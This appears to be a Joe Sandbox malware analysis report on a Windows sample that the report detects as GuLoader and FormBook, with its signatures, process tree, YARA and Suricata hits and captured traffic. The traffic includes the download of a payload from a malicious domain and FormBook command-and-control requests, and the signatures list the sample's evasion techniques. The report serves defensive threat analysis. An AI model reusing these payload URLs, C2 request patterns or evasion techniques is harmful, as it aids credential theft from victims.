Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ZAMOWIEN.BAT.exe

Overview

General Information

Sample name:ZAMOWIEN.BAT.exe
Analysis ID:1566409
MD5:2dbe82e3bc304a5b59b1b7c080464f60
SHA1:1db6b6aee8dc85204b14b73a526cddec8a59b700
SHA256:11c06f789150adb1484d8f5919399c11be0c4fbc04af20847d4dcb83cb648f02
Tags:exeGuLoaderuser-zxczxc
Infos:

Detection

FormBook, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
Yara detected GuLoader
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • ZAMOWIEN.BAT.exe (PID: 7448 cmdline: "C:\Users\user\Desktop\ZAMOWIEN.BAT.exe" MD5: 2DBE82E3BC304A5B59B1B7C080464F60)
    • ZAMOWIEN.BAT.exe (PID: 8036 cmdline: "C:\Users\user\Desktop\ZAMOWIEN.BAT.exe" MD5: 2DBE82E3BC304A5B59B1B7C080464F60)
      • iIQnSvahHYwDQ.exe (PID: 744 cmdline: "C:\Program Files (x86)\zwojYNvpHbLeEvMMuTenUtTXbuJNZmJMTDCZVBCvwDxlRuiypdrgAjIBhoxIn\iIQnSvahHYwDQ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • sdchange.exe (PID: 5016 cmdline: "C:\Windows\SysWOW64\sdchange.exe" MD5: 8E93B557363D8400A8B9F2D70AEB222B)
          • iIQnSvahHYwDQ.exe (PID: 3448 cmdline: "C:\Program Files (x86)\zwojYNvpHbLeEvMMuTenUtTXbuJNZmJMTDCZVBCvwDxlRuiypdrgAjIBhoxIn\iIQnSvahHYwDQ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7252 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000006.00000002.2884679975.00000000030B0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000004.00000002.2456986862.00000000324B0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000006.00000002.2885632879.0000000004E10000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000008.00000002.2885196470.0000000000920000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000006.00000002.2885664510.0000000004E60000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 3 entries
            No Sigma rule has matched
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-02T07:10:28.387140+010020507451Malware Command and Control Activity Detected192.168.2.449803195.110.124.13380TCP
            2024-12-02T07:10:53.421938+010020507451Malware Command and Control Activity Detected192.168.2.449865172.67.145.23480TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-02T07:09:45.075605+010028032702Potentially Bad Traffic192.168.2.449736103.83.194.5080TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-02T07:10:45.307145+010028554641A Network Trojan was detected192.168.2.449844172.67.145.23480TCP
            2024-12-02T07:10:47.946576+010028554641A Network Trojan was detected192.168.2.449850172.67.145.23480TCP
            2024-12-02T07:10:50.711038+010028554641A Network Trojan was detected192.168.2.449856172.67.145.23480TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: ZAMOWIEN.BAT.exeAvira: detected
            Source: ZAMOWIEN.BAT.exeReversingLabs: Detection: 13%
            Source: ZAMOWIEN.BAT.exeVirustotal: Detection: 18%Perma Link
            Source: Yara matchFile source: 00000006.00000002.2884679975.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2456986862.00000000324B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2885632879.0000000004E10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.2885196470.0000000000920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2885664510.0000000004E60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2457299942.0000000035D10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.2885603414.0000000005530000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: ZAMOWIEN.BAT.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: ZAMOWIEN.BAT.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: sdchange.pdbGCTL source: ZAMOWIEN.BAT.exe, 00000004.00000003.2393602242.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, iIQnSvahHYwDQ.exe, 00000005.00000002.2885039540.00000000004E8000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mshtml.pdb source: ZAMOWIEN.BAT.exe, 00000004.00000001.2060816132.0000000000649000.00000020.00000001.01000000.00000009.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: iIQnSvahHYwDQ.exe, 00000005.00000002.2885324089.0000000000E0E000.00000002.00000001.01000000.0000000A.sdmp, iIQnSvahHYwDQ.exe, 00000008.00000002.2885556820.0000000000E0E000.00000002.00000001.01000000.0000000A.sdmp
            Source: Binary string: wntdll.pdbUGP source: ZAMOWIEN.BAT.exe, 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmp, ZAMOWIEN.BAT.exe, 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, ZAMOWIEN.BAT.exe, 00000004.00000003.2331545937.0000000032615000.00000004.00000020.00020000.00000000.sdmp, ZAMOWIEN.BAT.exe, 00000004.00000003.2329811647.000000003246D000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, 00000006.00000003.2442207116.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, 00000006.00000002.2885751351.000000000511E000.00000040.00001000.00020000.00000000.sdmp, sdchange.exe, 00000006.00000003.2440236636.0000000004C27000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, 00000006.00000002.2885751351.0000000004F80000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: ZAMOWIEN.BAT.exe, ZAMOWIEN.BAT.exe, 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmp, ZAMOWIEN.BAT.exe, 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, ZAMOWIEN.BAT.exe, 00000004.00000003.2331545937.0000000032615000.00000004.00000020.00020000.00000000.sdmp, ZAMOWIEN.BAT.exe, 00000004.00000003.2329811647.000000003246D000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, sdchange.exe, 00000006.00000003.2442207116.0000000004DD0000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, 00000006.00000002.2885751351.000000000511E000.00000040.00001000.00020000.00000000.sdmp, sdchange.exe, 00000006.00000003.2440236636.0000000004C27000.00000004.00000020.00020000.00000000.sdmp, sdchange.exe, 00000006.00000002.2885751351.0000000004F80000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: mshtml.pdbUGP source: ZAMOWIEN.BAT.exe, 00000004.00000001.2060816132.0000000000649000.00000020.00000001.01000000.00000009.sdmp
            Source: Binary string: sdchange.pdb source: ZAMOWIEN.BAT.exe, 00000004.00000003.2393602242.00000000028AA000.00000004.00000020.00020000.00000000.sdmp, iIQnSvahHYwDQ.exe, 00000005.00000002.2885039540.00000000004E8000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 0_2_004069E5 FindFirstFileW,FindClose,0_2_004069E5
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeCode function: 0_2_00405D94 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405D94
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 6_2_030CC980 FindFirstFileW,FindNextFileW,FindClose,6_2_030CC980
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer ShortcutsJump to behavior
            Source: C:\Users\user\Desktop\ZAMOWIEN.BAT.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4x nop then xor eax, eax6_2_030B9EF0
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4x nop then pop edi6_2_030BE52E
            Source: C:\Windows\SysWOW64\sdchange.exeCode function: 4x nop then mov ebx, 00000004h6_2_052D04EF

            Networking

            barindex
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49803 -> 195.110.124.133:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49844 -> 172.67.145.234:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49850 -> 172.67.145.234:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49865 -> 172.67.145.234:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49856 -> 172.67.145.234:80
            Source: DNS query: www.tals.xyz
            Source: Joe Sandbox ViewIP Address: 195.110.124.133 195.110.124.133
            Source: Joe Sandbox ViewASN Name: REGISTER-ASIT REGISTER-ASIT
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49736 -> 103.83.194.50:80
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /po.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: ectasia.sa.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /vlg0/?WPjx20M=qomJeF/TtZ0QUZ/lu9XGw5rEDKlC0VH3n7TxRqREffWgONqaapTJswa8a+ti36YSjfwaEcz7GfWHOzY8D/KxwVpCEXfXsdPRTHALBjA15rmVzjOLWJp7K7s=&bxJPx=a6h4-FrPGbkpc HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.officinadelpasso.shopConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
            Source: global trafficHTTP traffic detected: GET /4twy/?WPjx20M=mBCElVLkK93E7Nf+SfzPyEy2pe/+ELSSyRrruRXkg+zqtIWho1c/UIFICRtgbVPxo7eZFunASSkRDpjuJtL+SqF6mTOIbDVEeaMEgz/yh1+O2PfmmYS3a3E=&bxJPx=a6h4-FrPGbkpc HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.vayui.topConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0
            Source: global trafficDNS traffic detected: DNS query: ectasia.sa.com
            Source: global trafficDNS traffic detected: DNS query: www.officinadelpasso.shop
            Source: global trafficDNS traffic detected: DNS query: www.vayui.top
            Source: global trafficDNS traffic detected: DNS query: www.tals.xyz
            Source: unknownHTTP traffic detected: POST /4twy/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-usHost: www.vayui.topOrigin: http://www.vayui.topReferer: http://www.vayui.top/4twy/Cache-Control: max-age=0Content-Type: application/x-www-form-urlencodedContent-Length: 204Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; rv:29.0) Gecko/20100101 Firefox/29.0Data Raw: 57 50 6a 78 32 30 4d 3d 72 44 71 6b 6d 68 44 32 4c 4f 6e 54 78 39 72 38 66 73 62 6d 7a 32 4f 38 69 4d 43 57 46 50 57 4d 78 43 6a 49 6e 6b 36 6d 67 66 6a 48 6c 72 69 50 6d 41 63 33 58 34 73 55 46 69 39 69 48 79 79 67 79 72 4f 45 48 2f 54 4f 58 43 45 4c 41 34 2b 2f 4f 64 58 46 48 64 49 39 6a 53 79 6f 45 79 35 38 62 35 77 75 31 54 57 6d 2f 45 71 53 37 49 4b 63 69 72 54 35 66 57 49 33 75 66 4a 47 4a 43 61 54 39 59 31 6e 68 73 35 6a 46 6f 51 57 34 65 6e 6e 68 62 63 7a 6f 4e 4f 37 78 69 64 6b 73 6e 4e 35 54 48 59 48 68 58 6d 30 4a 39 35 46 73 55 50 67 57 45 45 6d 71 6c 6d 4f 56 49 72 31 64 71 4d 43 32 51 3d 3d Data Ascii: WPjx20M=rDqkmhD2LOnTx9r8fsbmz2O8iMCWFPWMxCjInk6mgfjHlriPmAc3X4sUFi9iHyygyrOEH/TOXCELA4+/OdXFHdI9jSyoEy58b5wu1TWm/EqS7IKcirT5fWI3ufJGJCaT9Y1nhs5jFoQW4ennhbczoNO7xidksnN5THYHhXm0J95FsUPgWEEmqlmOVIr1dqMC2Q==
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 06:10:28 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 76 6c 67 30 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /vlg0/ was not found on this server.</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 06:10:45 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fbDtQFdH5vqzgzxEqH9Up%2BQph0L4%2FNCHYnHPeq6fKeK9wVHQR%2FbZ0K3I5uPKJL3eveHE8KTU0TMnW8K3kZ5%2BjT1VOo287VtkcncTTqJ7KwOxQrPQgma7ZwJj2RmpzNDv"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8eb927d74c620f60-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1486&min_rtt=1486&rtt_var=743&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=711&delivery_rate=0&cwnd=209&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 06:10:47 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oEIWy2cbIzmxwlo7Ub5u%2FFjh%2BfUS0lr3QbBfQVKN2LmUOD8bwtfkJMCD3JoWp6W%2FscuaPV8Ted2jeQ17w0UTbuGHRReF%2FGHRgoHRtrZnSisO0kYmCsOvgM4JI1r9TVH9"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8eb927e7be114294-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1713&min_rtt=1713&rtt_var=856&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=731&delivery_rate=0&cwnd=211&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 06:10:50 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Amd3muBhw0lr9yOsgIVTXOd6piF8IyWGGgVEoLmlLM5KfSLUidfU2x%2FqlRRk7%2BhyS81Zdb54wpulQSueONeSOFQMCnRQ2a6ZiA80maXAnQtN8eE%2F9B9xUM0sdOP2QMUB"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8eb927f8ed518c42-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1982&min_rtt=1982&rtt_var=991&sent=7&recv=12&lost=0&retrans=0&sent_bytes=0&recv_bytes=10813&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 02 Dec 2024 06:10:53 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0ptIhjyLo636hqVzj9NRO5lXvHSLk1Gz1HFNam%2BQiz8zfRogeGEXpgyXO2LRPWVQQ8h06MfE9wCqhm4yerlS%2BEEBo2PHiY1ilEFxIeL1%2BbOY28lnJaRBAtcnB5RnqAeR"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8eb92809fbed42da-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1574&min_rtt=1574&rtt_var=787&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=460&delivery_rate=0&cwnd=222&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0
            Source: ZAMOWIEN.BAT.exe, 00000004.00000002.2427146107.0000000002859000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ectasia.sa.com/po.bin
            Source: ZAMOWIEN.BAT.exe, 00000004.00000002.2427146107.0000000002848000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ectasia.sa.com/po.binL
            Source: ZAMOWIEN.BAT.exe, 00000004.00000002.2427146107.0000000002859000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ectasia.sa.com/po.binca
            Source: ZAMOWIEN.BAT.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: ZAMOWIEN.BAT.exe, 00000004.00000001.2060816132.0000000000649000.00000020.00000001.01000000.00000009.sdmpString found in binary or memory: http://www.ftp.ftp://ftp.gopher.
            Source: iIQnSvahHYwDQ.exe, 00000008.00000002.2885196470.00000000009AD000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.vayui.top
            Source: iIQnSvahHYwDQ.exe, 00000008.00000002.2885196470.00000000009AD000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.vayui.top/4twy/
            Source: ZAMOWIEN.BAT.exe, 00000004.00000001.2060816132.00000000005F2000.00000020.00000001.01000000.00000009.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
            Source: ZAMOWIEN.BAT.exe, 00000004.00000001.2060816132.00000000005F2000.00000020.00000001.01000000.00000009.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
            Source: sdchange.exe, 00000006.00000002.2887417138.0000000008228000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: sdchange.exe, 00000006.00000002.2887417138.0000000008228000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: sdchange.exe, 00000006.00000002.2887417138.0000000008228000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: sdchange.exe, 00000006.00000002.2887417138.0000000008228000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: sdchange.exe, 00000006.00000002.2887417138.0000000008228000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: sdchange.exe, 00000006.00000002.2887417138.0000000008228000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: sdchange.exe, 00000006.00000002.2887417138.0000000008228000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: ZAMOWIEN.BAT.exe, 00000004.00000001.2060816132.0000000000649000.00000020.00000001.01000000.00000009.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
            Source: sdchange.exe, 00000006.00000002.2884931299.0000000003387000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: sdchange.exe, 00000006.00000002.2884931299.0000000003387000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: sdchange.exe, 00000006.00000002.2884931299.0000000003387000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: sdchange.exe, 00000006.00000002.2884931299.0000000003387000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: sdchange.exe, 00000006.00000002.2884931299.0000000003387000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: sdchange.exe, 00000006.00000003.2615598045.0000000008201000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
            Source: sdchange.exe, 00000006.00000002.2887417138.0000000008228000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/

            E-Banking Fraud

            barindex
            Source: Yara matchFile source: 00000006.00000002.2884679975.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2456986862.00000000324B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2885632879.0000000004E10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.2885196470.0000000000920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
